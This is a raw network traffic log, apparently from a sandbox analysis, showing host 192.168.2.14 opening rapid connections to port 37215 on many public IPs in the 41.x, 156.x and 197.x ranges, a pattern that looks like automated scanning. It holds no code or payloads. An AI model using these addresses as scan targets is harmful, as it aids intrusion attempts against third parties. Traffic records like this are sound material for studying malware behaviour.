                                                        Jun 13, 2024 21:32:03.289613962 CEST5238837215192.168.2.14197.181.128.207
                                                        Jun 13, 2024 21:32:03.289619923 CEST372154060041.31.232.127192.168.2.14
                                                        Jun 13, 2024 21:32:03.289629936 CEST3721548030156.53.92.173192.168.2.14
                                                        Jun 13, 2024 21:32:03.289630890 CEST5460237215192.168.2.14197.185.19.212
                                                        Jun 13, 2024 21:32:03.289639950 CEST372153381041.112.63.221192.168.2.14
                                                        Jun 13, 2024 21:32:03.289639950 CEST5951037215192.168.2.1441.78.129.83
                                                        Jun 13, 2024 21:32:03.289649963 CEST3473037215192.168.2.14197.190.221.106
                                                        Jun 13, 2024 21:32:03.289661884 CEST3721548286156.53.92.173192.168.2.14
                                                        Jun 13, 2024 21:32:03.289666891 CEST4060037215192.168.2.1441.31.232.127
                                                        Jun 13, 2024 21:32:03.289666891 CEST5636237215192.168.2.1441.220.176.254
                                                        Jun 13, 2024 21:32:03.289671898 CEST372153406641.112.63.221192.168.2.14
                                                        Jun 13, 2024 21:32:03.289683104 CEST5113837215192.168.2.1441.73.50.38
                                                        Jun 13, 2024 21:32:03.289684057 CEST372154654841.30.149.64192.168.2.14
                                                        Jun 13, 2024 21:32:03.289694071 CEST372154680441.30.149.64192.168.2.14
                                                        Jun 13, 2024 21:32:03.289699078 CEST5722037215192.168.2.1441.178.85.17
                                                        Jun 13, 2024 21:32:03.289704084 CEST372155808841.120.240.25192.168.2.14
                                                        Jun 13, 2024 21:32:03.289709091 CEST3406637215192.168.2.1441.112.63.221
                                                        Jun 13, 2024 21:32:03.289715052 CEST372155834441.120.240.25192.168.2.14
                                                        Jun 13, 2024 21:32:03.289715052 CEST4828637215192.168.2.14156.53.92.173
                                                        Jun 13, 2024 21:32:03.289716959 CEST4650237215192.168.2.14197.32.214.232
                                                        Jun 13, 2024 21:32:03.289716959 CEST4680437215192.168.2.1441.30.149.64
                                                        Jun 13, 2024 21:32:03.289725065 CEST3721555618197.212.192.227192.168.2.14
                                                        Jun 13, 2024 21:32:03.289733887 CEST3721555874197.212.192.227192.168.2.14
                                                        Jun 13, 2024 21:32:03.289753914 CEST3721560874156.145.120.237192.168.2.14
                                                        Jun 13, 2024 21:32:03.289753914 CEST5834437215192.168.2.1441.120.240.25
                                                        Jun 13, 2024 21:32:03.289760113 CEST4794237215192.168.2.14197.200.253.22
                                                        Jun 13, 2024 21:32:03.289762974 CEST3721532898156.145.120.237192.168.2.14
                                                        Jun 13, 2024 21:32:03.289767027 CEST5587437215192.168.2.14197.212.192.227
                                                        Jun 13, 2024 21:32:03.289772987 CEST3721533726156.109.239.35192.168.2.14
                                                        Jun 13, 2024 21:32:03.289783001 CEST3721533982156.109.239.35192.168.2.14
                                                        Jun 13, 2024 21:32:03.289796114 CEST3289837215192.168.2.14156.145.120.237
                                                        Jun 13, 2024 21:32:03.289797068 CEST3721545514197.235.36.247192.168.2.14
                                                        Jun 13, 2024 21:32:03.289798021 CEST5559637215192.168.2.14197.175.74.47
                                                        Jun 13, 2024 21:32:03.289798975 CEST5596637215192.168.2.1441.193.199.134
                                                        Jun 13, 2024 21:32:03.289808035 CEST3721545770197.235.36.247192.168.2.14
                                                        Jun 13, 2024 21:32:03.289815903 CEST4503437215192.168.2.1441.183.64.86
                                                        Jun 13, 2024 21:32:03.289819956 CEST4481437215192.168.2.14197.152.83.80
                                                        Jun 13, 2024 21:32:03.289828062 CEST3398237215192.168.2.14156.109.239.35
                                                        Jun 13, 2024 21:32:03.289829016 CEST3721552458156.150.6.110192.168.2.14
                                                        Jun 13, 2024 21:32:03.289841890 CEST4577037215192.168.2.14197.235.36.247
                                                        Jun 13, 2024 21:32:03.289865971 CEST5041437215192.168.2.14197.86.69.163
                                                        Jun 13, 2024 21:32:03.289870977 CEST3721552714156.150.6.110192.168.2.14
                                                        Jun 13, 2024 21:32:03.289871931 CEST4189037215192.168.2.1441.221.110.141
                                                        Jun 13, 2024 21:32:03.289880991 CEST3721560912156.200.130.213192.168.2.14
                                                        Jun 13, 2024 21:32:03.289890051 CEST3785237215192.168.2.1441.28.77.14
                                                        Jun 13, 2024 21:32:03.289891005 CEST3966237215192.168.2.14197.17.79.167
                                                        Jun 13, 2024 21:32:03.289891958 CEST3721532936156.200.130.213192.168.2.14
                                                        Jun 13, 2024 21:32:03.289899111 CEST4907837215192.168.2.14197.174.171.58
                                                        Jun 13, 2024 21:32:03.289904118 CEST5271437215192.168.2.14156.150.6.110
                                                        Jun 13, 2024 21:32:03.289905071 CEST3721542696156.85.224.246192.168.2.14
                                                        Jun 13, 2024 21:32:03.289915085 CEST3721542952156.85.224.246192.168.2.14
                                                        Jun 13, 2024 21:32:03.289917946 CEST4354037215192.168.2.14197.160.148.203
                                                        Jun 13, 2024 21:32:03.289923906 CEST3721559446197.136.2.96192.168.2.14
                                                        Jun 13, 2024 21:32:03.289944887 CEST3721559702197.136.2.96192.168.2.14
                                                        Jun 13, 2024 21:32:03.289951086 CEST3293637215192.168.2.14156.200.130.213
                                                        Jun 13, 2024 21:32:03.289952040 CEST4163837215192.168.2.14156.46.54.126
                                                        Jun 13, 2024 21:32:03.289951086 CEST4295237215192.168.2.14156.85.224.246
                                                        Jun 13, 2024 21:32:03.289954901 CEST3721552998156.224.73.220192.168.2.14
                                                        Jun 13, 2024 21:32:03.289956093 CEST3406037215192.168.2.14156.236.184.245
                                                        Jun 13, 2024 21:32:03.289966106 CEST3721553254156.224.73.220192.168.2.14
                                                        Jun 13, 2024 21:32:03.289969921 CEST5460237215192.168.2.14197.185.19.212
                                                        Jun 13, 2024 21:32:03.289973974 CEST5970237215192.168.2.14197.136.2.96
                                                        Jun 13, 2024 21:32:03.289975882 CEST372154107041.34.96.28192.168.2.14
                                                        Jun 13, 2024 21:32:03.289987087 CEST372154132641.34.96.28192.168.2.14
                                                        Jun 13, 2024 21:32:03.289995909 CEST3721559232156.51.40.232192.168.2.14
                                                        Jun 13, 2024 21:32:03.290000916 CEST5325437215192.168.2.14156.224.73.220
                                                        Jun 13, 2024 21:32:03.290003061 CEST4060037215192.168.2.1441.31.232.127
                                                        Jun 13, 2024 21:32:03.290014029 CEST4132637215192.168.2.1441.34.96.28
                                                        Jun 13, 2024 21:32:03.290018082 CEST4828637215192.168.2.14156.53.92.173
                                                        Jun 13, 2024 21:32:03.290025949 CEST3721559488156.51.40.232192.168.2.14
                                                        Jun 13, 2024 21:32:03.290035009 CEST3406637215192.168.2.1441.112.63.221
                                                        Jun 13, 2024 21:32:03.290035009 CEST4680437215192.168.2.1441.30.149.64
                                                        Jun 13, 2024 21:32:03.290040016 CEST3721547158197.238.194.238192.168.2.14
                                                        Jun 13, 2024 21:32:03.290050030 CEST3721547414197.238.194.238192.168.2.14
                                                        Jun 13, 2024 21:32:03.290052891 CEST5834437215192.168.2.1441.120.240.25
                                                        Jun 13, 2024 21:32:03.290057898 CEST5587437215192.168.2.14197.212.192.227
                                                        Jun 13, 2024 21:32:03.290060043 CEST3721535942156.75.42.168192.168.2.14
                                                        Jun 13, 2024 21:32:03.290066957 CEST5948837215192.168.2.14156.51.40.232
                                                        Jun 13, 2024 21:32:03.290066957 CEST3289837215192.168.2.14156.145.120.237
                                                        Jun 13, 2024 21:32:03.290071011 CEST3721536198156.75.42.168192.168.2.14
                                                        Jun 13, 2024 21:32:03.290082932 CEST3721545034197.118.96.81192.168.2.14
                                                        Jun 13, 2024 21:32:03.290085077 CEST4741437215192.168.2.14197.238.194.238
                                                        Jun 13, 2024 21:32:03.290102005 CEST3721545290197.118.96.81192.168.2.14
                                                        Jun 13, 2024 21:32:03.290102959 CEST3619837215192.168.2.14156.75.42.168
                                                        Jun 13, 2024 21:32:03.290112019 CEST3721553186156.135.255.113192.168.2.14
                                                        Jun 13, 2024 21:32:03.290122986 CEST3721553442156.135.255.113192.168.2.14
                                                        Jun 13, 2024 21:32:03.290122986 CEST3398237215192.168.2.14156.109.239.35
                                                        Jun 13, 2024 21:32:03.290131092 CEST4577037215192.168.2.14197.235.36.247
                                                        Jun 13, 2024 21:32:03.290131092 CEST4529037215192.168.2.14197.118.96.81
                                                        Jun 13, 2024 21:32:03.290132999 CEST3721542672156.252.194.48192.168.2.14
                                                        Jun 13, 2024 21:32:03.290143013 CEST3721542928156.252.194.48192.168.2.14
                                                        Jun 13, 2024 21:32:03.290152073 CEST3721549706156.15.119.11192.168.2.14
                                                        Jun 13, 2024 21:32:03.290158987 CEST5344237215192.168.2.14156.135.255.113
                                                        Jun 13, 2024 21:32:03.290162086 CEST3721549962156.15.119.11192.168.2.14
                                                        Jun 13, 2024 21:32:03.290172100 CEST5521637215192.168.2.14197.224.168.26
                                                        Jun 13, 2024 21:32:03.290173054 CEST3721548058156.100.103.80192.168.2.14
                                                        Jun 13, 2024 21:32:03.290184975 CEST4292837215192.168.2.14156.252.194.48
                                                        Jun 13, 2024 21:32:03.290186882 CEST4996237215192.168.2.14156.15.119.11
                                                        Jun 13, 2024 21:32:03.290193081 CEST3721548314156.100.103.80192.168.2.14
                                                        Jun 13, 2024 21:32:03.290208101 CEST5780837215192.168.2.1441.90.188.92
                                                        Jun 13, 2024 21:32:03.290215015 CEST3721540916156.38.59.86192.168.2.14
                                                        Jun 13, 2024 21:32:03.290224075 CEST4831437215192.168.2.14156.100.103.80
                                                        Jun 13, 2024 21:32:03.290225029 CEST3721541172156.38.59.86192.168.2.14
                                                        Jun 13, 2024 21:32:03.290232897 CEST3349437215192.168.2.14197.121.4.160
                                                        Jun 13, 2024 21:32:03.290235996 CEST3721546536156.2.71.33192.168.2.14
                                                        Jun 13, 2024 21:32:03.290251017 CEST3721546280156.2.71.33192.168.2.14
                                                        Jun 13, 2024 21:32:03.290258884 CEST4117237215192.168.2.14156.38.59.86
                                                        Jun 13, 2024 21:32:03.290258884 CEST3753637215192.168.2.14197.0.87.171
                                                        Jun 13, 2024 21:32:03.290258884 CEST4653637215192.168.2.14156.2.71.33
                                                        Jun 13, 2024 21:32:03.290261030 CEST3721533976197.163.2.0192.168.2.14
                                                        Jun 13, 2024 21:32:03.290283918 CEST3721534232197.163.2.0192.168.2.14
                                                        Jun 13, 2024 21:32:03.290287971 CEST5462237215192.168.2.1441.92.153.193
                                                        Jun 13, 2024 21:32:03.290294886 CEST3721560816197.245.198.17192.168.2.14
                                                        Jun 13, 2024 21:32:03.290303946 CEST3721532840197.245.198.17192.168.2.14
                                                        Jun 13, 2024 21:32:03.290304899 CEST4914837215192.168.2.1441.31.34.212
                                                        Jun 13, 2024 21:32:03.290313005 CEST3721541140156.13.239.178192.168.2.14
                                                        Jun 13, 2024 21:32:03.290317059 CEST3423237215192.168.2.14197.163.2.0
                                                        Jun 13, 2024 21:32:03.290319920 CEST4039037215192.168.2.14197.31.171.82
                                                        Jun 13, 2024 21:32:03.290323973 CEST3721541396156.13.239.178192.168.2.14
                                                        Jun 13, 2024 21:32:03.290333033 CEST3721546768197.137.20.236192.168.2.14
                                                        Jun 13, 2024 21:32:03.290334940 CEST3284037215192.168.2.14197.245.198.17
                                                        Jun 13, 2024 21:32:03.290359020 CEST4139637215192.168.2.14156.13.239.178
                                                        Jun 13, 2024 21:32:03.290380955 CEST4407837215192.168.2.14156.157.209.9
                                                        Jun 13, 2024 21:32:03.290404081 CEST5925637215192.168.2.1441.215.215.91
                                                        Jun 13, 2024 21:32:03.290414095 CEST4850637215192.168.2.14197.242.43.85
                                                        Jun 13, 2024 21:32:03.290417910 CEST5314637215192.168.2.14197.38.131.214
                                                        Jun 13, 2024 21:32:03.290430069 CEST4901437215192.168.2.14197.229.252.255
                                                        Jun 13, 2024 21:32:03.290440083 CEST5459837215192.168.2.1441.219.159.105
                                                        Jun 13, 2024 21:32:03.290441990 CEST3721547024197.137.20.236192.168.2.14
                                                        Jun 13, 2024 21:32:03.290453911 CEST372155287041.142.34.29192.168.2.14
                                                        Jun 13, 2024 21:32:03.290456057 CEST4016437215192.168.2.14156.128.127.167
                                                        Jun 13, 2024 21:32:03.290466070 CEST372155312641.142.34.29192.168.2.14
                                                        Jun 13, 2024 21:32:03.290468931 CEST4726237215192.168.2.14156.20.198.100
                                                        Jun 13, 2024 21:32:03.290469885 CEST4702437215192.168.2.14197.137.20.236
                                                        Jun 13, 2024 21:32:03.290477037 CEST372154457841.49.50.178192.168.2.14
                                                        Jun 13, 2024 21:32:03.290478945 CEST4580437215192.168.2.1441.9.2.99
                                                        Jun 13, 2024 21:32:03.290487051 CEST372154432241.49.50.178192.168.2.14
                                                        Jun 13, 2024 21:32:03.290507078 CEST5313037215192.168.2.14197.19.0.15
                                                        Jun 13, 2024 21:32:03.290508032 CEST3721558916156.40.255.202192.168.2.14
                                                        Jun 13, 2024 21:32:03.290509939 CEST4457837215192.168.2.1441.49.50.178
                                                        Jun 13, 2024 21:32:03.290508986 CEST5312637215192.168.2.1441.142.34.29
                                                        Jun 13, 2024 21:32:03.290518045 CEST3721559172156.40.255.202192.168.2.14
                                                        Jun 13, 2024 21:32:03.290528059 CEST3721547686197.248.245.187192.168.2.14
                                                        Jun 13, 2024 21:32:03.290539026 CEST3721547942197.248.245.187192.168.2.14
                                                        Jun 13, 2024 21:32:03.290549040 CEST3721542156156.107.211.96192.168.2.14
                                                        Jun 13, 2024 21:32:03.290550947 CEST5917237215192.168.2.14156.40.255.202
                                                        Jun 13, 2024 21:32:03.290560007 CEST6019037215192.168.2.14197.255.141.127
                                                        Jun 13, 2024 21:32:03.290560961 CEST3721542412156.107.211.96192.168.2.14
                                                        Jun 13, 2024 21:32:03.290569067 CEST4794237215192.168.2.14197.248.245.187
                                                        Jun 13, 2024 21:32:03.290581942 CEST3721545212156.98.126.146192.168.2.14
                                                        Jun 13, 2024 21:32:03.290585041 CEST5271437215192.168.2.14156.150.6.110
                                                        Jun 13, 2024 21:32:03.290595055 CEST4241237215192.168.2.14156.107.211.96
                                                        Jun 13, 2024 21:32:03.290602922 CEST3721545468156.98.126.146192.168.2.14
                                                        Jun 13, 2024 21:32:03.290604115 CEST3293637215192.168.2.14156.200.130.213
                                                        Jun 13, 2024 21:32:03.290612936 CEST3721536906156.184.236.36192.168.2.14
                                                        Jun 13, 2024 21:32:03.290625095 CEST5970237215192.168.2.14197.136.2.96
                                                        Jun 13, 2024 21:32:03.290625095 CEST4295237215192.168.2.14156.85.224.246
                                                        Jun 13, 2024 21:32:03.290635109 CEST5325437215192.168.2.14156.224.73.220
                                                        Jun 13, 2024 21:32:03.290636063 CEST3721537162156.184.236.36192.168.2.14
                                                        Jun 13, 2024 21:32:03.290636063 CEST4546837215192.168.2.14156.98.126.146
                                                        Jun 13, 2024 21:32:03.290642023 CEST4132637215192.168.2.1441.34.96.28
                                                        Jun 13, 2024 21:32:03.290646076 CEST372153432441.177.114.51192.168.2.14
                                                        Jun 13, 2024 21:32:03.290649891 CEST5948837215192.168.2.14156.51.40.232
                                                        Jun 13, 2024 21:32:03.290656090 CEST372153458041.177.114.51192.168.2.14
                                                        Jun 13, 2024 21:32:03.290666103 CEST3716237215192.168.2.14156.184.236.36
                                                        Jun 13, 2024 21:32:03.290667057 CEST3721550684197.11.150.37192.168.2.14
                                                        Jun 13, 2024 21:32:03.290677071 CEST4741437215192.168.2.14197.238.194.238
                                                        Jun 13, 2024 21:32:03.290678024 CEST3721550940197.11.150.37192.168.2.14
                                                        Jun 13, 2024 21:32:03.290687084 CEST3721560154197.98.113.18192.168.2.14
                                                        Jun 13, 2024 21:32:03.290695906 CEST3458037215192.168.2.1441.177.114.51
                                                        Jun 13, 2024 21:32:03.290709019 CEST3619837215192.168.2.14156.75.42.168
                                                        Jun 13, 2024 21:32:03.290716887 CEST5094037215192.168.2.14197.11.150.37
                                                        Jun 13, 2024 21:32:03.290716887 CEST4529037215192.168.2.14197.118.96.81
                                                        Jun 13, 2024 21:32:03.290718079 CEST5344237215192.168.2.14156.135.255.113
                                                        Jun 13, 2024 21:32:03.290735960 CEST4292837215192.168.2.14156.252.194.48
                                                        Jun 13, 2024 21:32:03.290740967 CEST4996237215192.168.2.14156.15.119.11
                                                        Jun 13, 2024 21:32:03.290749073 CEST4831437215192.168.2.14156.100.103.80
                                                        Jun 13, 2024 21:32:03.290766954 CEST4117237215192.168.2.14156.38.59.86
                                                        Jun 13, 2024 21:32:03.290766954 CEST4653637215192.168.2.14156.2.71.33
                                                        Jun 13, 2024 21:32:03.290786982 CEST3423237215192.168.2.14197.163.2.0
                                                        Jun 13, 2024 21:32:03.290791035 CEST3284037215192.168.2.14197.245.198.17
                                                        Jun 13, 2024 21:32:03.290802002 CEST4139637215192.168.2.14156.13.239.178
                                                        Jun 13, 2024 21:32:03.290817022 CEST4702437215192.168.2.14197.137.20.236
                                                        Jun 13, 2024 21:32:03.290817022 CEST4457837215192.168.2.1441.49.50.178
                                                        Jun 13, 2024 21:32:03.290817022 CEST5917237215192.168.2.14156.40.255.202
                                                        Jun 13, 2024 21:32:03.290821075 CEST5312637215192.168.2.1441.142.34.29
                                                        Jun 13, 2024 21:32:03.290834904 CEST4552037215192.168.2.14197.126.60.187
                                                        Jun 13, 2024 21:32:03.290842056 CEST3721560410197.98.113.18192.168.2.14
                                                        Jun 13, 2024 21:32:03.290853024 CEST3721559202156.73.112.15192.168.2.14
                                                        Jun 13, 2024 21:32:03.290863037 CEST5913437215192.168.2.14197.208.7.5
                                                        Jun 13, 2024 21:32:03.290863991 CEST3721559456156.73.112.15192.168.2.14
                                                        Jun 13, 2024 21:32:03.290865898 CEST5377837215192.168.2.1441.194.81.49
                                                        Jun 13, 2024 21:32:03.290874004 CEST372155261041.228.70.82192.168.2.14
                                                        Jun 13, 2024 21:32:03.290883064 CEST6041037215192.168.2.14197.98.113.18
                                                        Jun 13, 2024 21:32:03.290883064 CEST4226237215192.168.2.14197.54.214.186
                                                        Jun 13, 2024 21:32:03.290884018 CEST372155286841.228.70.82192.168.2.14
                                                        Jun 13, 2024 21:32:03.290889978 CEST5945637215192.168.2.14156.73.112.15
                                                        Jun 13, 2024 21:32:03.290893078 CEST4055437215192.168.2.1441.154.183.230
                                                        Jun 13, 2024 21:32:03.290894985 CEST3721555780156.52.1.101192.168.2.14
                                                        Jun 13, 2024 21:32:03.290904999 CEST3721556036156.52.1.101192.168.2.14
                                                        Jun 13, 2024 21:32:03.290915012 CEST3721540000197.146.168.47192.168.2.14
                                                        Jun 13, 2024 21:32:03.290918112 CEST5286837215192.168.2.1441.228.70.82
                                                        Jun 13, 2024 21:32:03.290935040 CEST5603637215192.168.2.14156.52.1.101
                                                        Jun 13, 2024 21:32:03.290952921 CEST5492237215192.168.2.1441.52.60.11
                                                        Jun 13, 2024 21:32:03.290966988 CEST5791437215192.168.2.14197.9.104.150
                                                        Jun 13, 2024 21:32:03.290988922 CEST3499437215192.168.2.1441.241.137.195
                                                        Jun 13, 2024 21:32:03.290997982 CEST5872637215192.168.2.14156.100.135.200
                                                        Jun 13, 2024 21:32:03.291016102 CEST3344637215192.168.2.1441.19.25.177
                                                        Jun 13, 2024 21:32:03.291030884 CEST3606037215192.168.2.14156.198.37.143
                                                        Jun 13, 2024 21:32:03.291043043 CEST4427837215192.168.2.14197.184.21.96
                                                        Jun 13, 2024 21:32:03.291049004 CEST5274437215192.168.2.14156.40.117.185
                                                        Jun 13, 2024 21:32:03.291066885 CEST5348437215192.168.2.1441.101.93.122
                                                        Jun 13, 2024 21:32:03.291091919 CEST4656437215192.168.2.14156.114.244.226
                                                        Jun 13, 2024 21:32:03.291098118 CEST3721540256197.146.168.47192.168.2.14
                                                        Jun 13, 2024 21:32:03.291104078 CEST3284837215192.168.2.14197.153.164.88
                                                        Jun 13, 2024 21:32:03.291105032 CEST5709837215192.168.2.14156.6.81.141
                                                        Jun 13, 2024 21:32:03.291109085 CEST3721534586197.212.212.239192.168.2.14
                                                        Jun 13, 2024 21:32:03.291116953 CEST5735837215192.168.2.14197.157.162.120
                                                        Jun 13, 2024 21:32:03.291119099 CEST3721534842197.212.212.239192.168.2.14
                                                        Jun 13, 2024 21:32:03.291126966 CEST4025637215192.168.2.14197.146.168.47
                                                        Jun 13, 2024 21:32:03.291130066 CEST3721538432197.35.140.134192.168.2.14
                                                        Jun 13, 2024 21:32:03.291134119 CEST4491237215192.168.2.14197.31.28.209
                                                        Jun 13, 2024 21:32:03.291152000 CEST3721538688197.35.140.134192.168.2.14
                                                        Jun 13, 2024 21:32:03.291158915 CEST3484237215192.168.2.14197.212.212.239
                                                        Jun 13, 2024 21:32:03.291158915 CEST3590037215192.168.2.14156.188.5.185
                                                        Jun 13, 2024 21:32:03.291162014 CEST3721543910197.194.155.30192.168.2.14
                                                        Jun 13, 2024 21:32:03.291172981 CEST3721543654197.194.155.30192.168.2.14
                                                        Jun 13, 2024 21:32:03.291182041 CEST372155902241.208.140.157192.168.2.14
                                                        Jun 13, 2024 21:32:03.291184902 CEST3868837215192.168.2.14197.35.140.134
                                                        Jun 13, 2024 21:32:03.291186094 CEST4381037215192.168.2.1441.0.235.156
                                                        Jun 13, 2024 21:32:03.291194916 CEST372155927841.208.140.157192.168.2.14
                                                        Jun 13, 2024 21:32:03.291196108 CEST4391037215192.168.2.14197.194.155.30
                                                        Jun 13, 2024 21:32:03.291204929 CEST372156028241.116.69.21192.168.2.14
                                                        Jun 13, 2024 21:32:03.291223049 CEST5529837215192.168.2.14156.28.117.211
                                                        Jun 13, 2024 21:32:03.291225910 CEST372156053841.116.69.21192.168.2.14
                                                        Jun 13, 2024 21:32:03.291234016 CEST5927837215192.168.2.1441.208.140.157
                                                        Jun 13, 2024 21:32:03.291250944 CEST5564637215192.168.2.14197.15.218.165
                                                        Jun 13, 2024 21:32:03.291261911 CEST6053837215192.168.2.1441.116.69.21
                                                        Jun 13, 2024 21:32:03.291299105 CEST4794237215192.168.2.14197.248.245.187
                                                        Jun 13, 2024 21:32:03.291302919 CEST4241237215192.168.2.14156.107.211.96
                                                        Jun 13, 2024 21:32:03.291306019 CEST4546837215192.168.2.14156.98.126.146
                                                        Jun 13, 2024 21:32:03.291321993 CEST3716237215192.168.2.14156.184.236.36
                                                        Jun 13, 2024 21:32:03.291335106 CEST3458037215192.168.2.1441.177.114.51
                                                        Jun 13, 2024 21:32:03.291344881 CEST5094037215192.168.2.14197.11.150.37
                                                        Jun 13, 2024 21:32:03.291357040 CEST6041037215192.168.2.14197.98.113.18
                                                        Jun 13, 2024 21:32:03.291372061 CEST5945637215192.168.2.14156.73.112.15
                                                        Jun 13, 2024 21:32:03.291373014 CEST5286837215192.168.2.1441.228.70.82
                                                        Jun 13, 2024 21:32:03.291383982 CEST4025637215192.168.2.14197.146.168.47
                                                        Jun 13, 2024 21:32:03.291387081 CEST5603637215192.168.2.14156.52.1.101
                                                        Jun 13, 2024 21:32:03.291403055 CEST3484237215192.168.2.14197.212.212.239
                                                        Jun 13, 2024 21:32:03.291404963 CEST3868837215192.168.2.14197.35.140.134
                                                        Jun 13, 2024 21:32:03.291423082 CEST4391037215192.168.2.14197.194.155.30
                                                        Jun 13, 2024 21:32:03.291423082 CEST5927837215192.168.2.1441.208.140.157
                                                        Jun 13, 2024 21:32:03.291455984 CEST6053837215192.168.2.1441.116.69.21
                                                        Jun 13, 2024 21:32:03.291460037 CEST4338037215192.168.2.14197.239.46.197
                                                        Jun 13, 2024 21:32:03.291465044 CEST3878037215192.168.2.14156.9.135.180
                                                        Jun 13, 2024 21:32:03.291476965 CEST4370837215192.168.2.14197.143.155.0
                                                        Jun 13, 2024 21:32:03.291482925 CEST372153415641.38.56.45192.168.2.14
                                                        Jun 13, 2024 21:32:03.291493893 CEST372153390041.38.56.45192.168.2.14
                                                        Jun 13, 2024 21:32:03.291497946 CEST5713237215192.168.2.1441.216.212.177
                                                        Jun 13, 2024 21:32:03.291503906 CEST3721541316156.178.110.31192.168.2.14
                                                        Jun 13, 2024 21:32:03.291505098 CEST3839437215192.168.2.14197.224.26.33
                                                        Jun 13, 2024 21:32:03.291515112 CEST3721541572156.178.110.31192.168.2.14
                                                        Jun 13, 2024 21:32:03.291520119 CEST3415637215192.168.2.1441.38.56.45
                                                        Jun 13, 2024 21:32:03.291526079 CEST3721554130197.205.249.150192.168.2.14
                                                        Jun 13, 2024 21:32:03.291543961 CEST4157237215192.168.2.14156.178.110.31
                                                        Jun 13, 2024 21:32:03.291548014 CEST3721554386197.205.249.150192.168.2.14
                                                        Jun 13, 2024 21:32:03.291558981 CEST3721539440156.36.62.71192.168.2.14
                                                        Jun 13, 2024 21:32:03.291560888 CEST4835837215192.168.2.14197.139.198.159
                                                        Jun 13, 2024 21:32:03.291568995 CEST3721539696156.36.62.71192.168.2.14
                                                        Jun 13, 2024 21:32:03.291579008 CEST3721538380197.211.1.204192.168.2.14
                                                        Jun 13, 2024 21:32:03.291582108 CEST5438637215192.168.2.14197.205.249.150
                                                        Jun 13, 2024 21:32:03.291582108 CEST4627837215192.168.2.1441.10.71.174
                                                        Jun 13, 2024 21:32:03.291589975 CEST3721538636197.211.1.204192.168.2.14
                                                        Jun 13, 2024 21:32:03.291604042 CEST3969637215192.168.2.14156.36.62.71
                                                        Jun 13, 2024 21:32:03.291609049 CEST3721536008197.39.167.206192.168.2.14
                                                        Jun 13, 2024 21:32:03.291615963 CEST5072437215192.168.2.1441.46.35.167
                                                        Jun 13, 2024 21:32:03.291620016 CEST3721536264197.39.167.206192.168.2.14
                                                        Jun 13, 2024 21:32:03.291625023 CEST3864237215192.168.2.14156.57.209.27
                                                        Jun 13, 2024 21:32:03.291625023 CEST3863637215192.168.2.14197.211.1.204
                                                        Jun 13, 2024 21:32:03.291630030 CEST3721548262156.85.29.213192.168.2.14
                                                        Jun 13, 2024 21:32:03.291640043 CEST3721557916197.207.174.181192.168.2.14
                                                        Jun 13, 2024 21:32:03.291649103 CEST3910837215192.168.2.14197.225.71.30
                                                        Jun 13, 2024 21:32:03.291649103 CEST3721553476156.170.35.32192.168.2.14
                                                        Jun 13, 2024 21:32:03.291652918 CEST3626437215192.168.2.14197.39.167.206
                                                        Jun 13, 2024 21:32:03.291661024 CEST3721548518156.85.29.213192.168.2.14
                                                        Jun 13, 2024 21:32:03.291665077 CEST3942837215192.168.2.14156.19.253.155
                                                        Jun 13, 2024 21:32:03.291666985 CEST5791637215192.168.2.14197.207.174.181
                                                        Jun 13, 2024 21:32:03.291671991 CEST3721557660197.207.174.181192.168.2.14
                                                        Jun 13, 2024 21:32:03.291682005 CEST5578237215192.168.2.14156.111.19.202
                                                        Jun 13, 2024 21:32:03.291682959 CEST3721553732156.170.35.32192.168.2.14
                                                        Jun 13, 2024 21:32:03.291711092 CEST4851837215192.168.2.14156.85.29.213
                                                        Jun 13, 2024 21:32:03.291712999 CEST4129237215192.168.2.1441.49.85.198
                                                        Jun 13, 2024 21:32:03.291712999 CEST5373237215192.168.2.14156.170.35.32
                                                        Jun 13, 2024 21:32:03.291729927 CEST6026437215192.168.2.1441.141.240.146
                                                        Jun 13, 2024 21:32:03.291753054 CEST4641237215192.168.2.14197.34.140.212
                                                        Jun 13, 2024 21:32:03.291783094 CEST3584237215192.168.2.1441.118.151.101
                                                        Jun 13, 2024 21:32:03.291790009 CEST3415637215192.168.2.1441.38.56.45
                                                        Jun 13, 2024 21:32:03.291791916 CEST4157237215192.168.2.14156.178.110.31
                                                        Jun 13, 2024 21:32:03.291807890 CEST5438637215192.168.2.14197.205.249.150
                                                        Jun 13, 2024 21:32:03.291810036 CEST3969637215192.168.2.14156.36.62.71
                                                        Jun 13, 2024 21:32:03.291815042 CEST3863637215192.168.2.14197.211.1.204
                                                        Jun 13, 2024 21:32:03.291831970 CEST3626437215192.168.2.14197.39.167.206
                                                        Jun 13, 2024 21:32:03.291846991 CEST5791637215192.168.2.14197.207.174.181
                                                        Jun 13, 2024 21:32:03.291846991 CEST4851837215192.168.2.14156.85.29.213
                                                        Jun 13, 2024 21:32:03.291853905 CEST5373237215192.168.2.14156.170.35.32
                                                        Jun 13, 2024 21:32:03.291873932 CEST4137437215192.168.2.14197.239.228.132
                                                        Jun 13, 2024 21:32:03.291898012 CEST3405637215192.168.2.14197.11.243.135
                                                        Jun 13, 2024 21:32:03.291918993 CEST3721535978156.217.252.15192.168.2.14
                                                        Jun 13, 2024 21:32:03.291924000 CEST5480637215192.168.2.14156.150.237.0
                                                        Jun 13, 2024 21:32:03.291924000 CEST5279637215192.168.2.14197.241.250.223
                                                        Jun 13, 2024 21:32:03.291929960 CEST3721536234156.217.252.15192.168.2.14
                                                        Jun 13, 2024 21:32:03.291938066 CEST5037237215192.168.2.14156.255.127.63
                                                        Jun 13, 2024 21:32:03.291939974 CEST3721554624156.22.15.149192.168.2.14
                                                        Jun 13, 2024 21:32:03.291950941 CEST3721554880156.22.15.149192.168.2.14
                                                        Jun 13, 2024 21:32:03.291956902 CEST3434637215192.168.2.14156.204.251.70
                                                        Jun 13, 2024 21:32:03.291960955 CEST372155073041.46.40.162192.168.2.14
                                                        Jun 13, 2024 21:32:03.291971922 CEST372155098641.46.40.162192.168.2.14
                                                        Jun 13, 2024 21:32:03.291973114 CEST3623437215192.168.2.14156.217.252.15
                                                        Jun 13, 2024 21:32:03.291976929 CEST3316437215192.168.2.1441.245.102.93
                                                        Jun 13, 2024 21:32:03.291980982 CEST3721551406197.100.45.9192.168.2.14
                                                        Jun 13, 2024 21:32:03.291982889 CEST5488037215192.168.2.14156.22.15.149
                                                        Jun 13, 2024 21:32:03.291985035 CEST4193237215192.168.2.14156.40.14.206
                                                        Jun 13, 2024 21:32:03.291992903 CEST3721551662197.100.45.9192.168.2.14
                                                        Jun 13, 2024 21:32:03.291994095 CEST4956037215192.168.2.14197.93.229.54
                                                        Jun 13, 2024 21:32:03.292002916 CEST3721550682156.66.84.142192.168.2.14
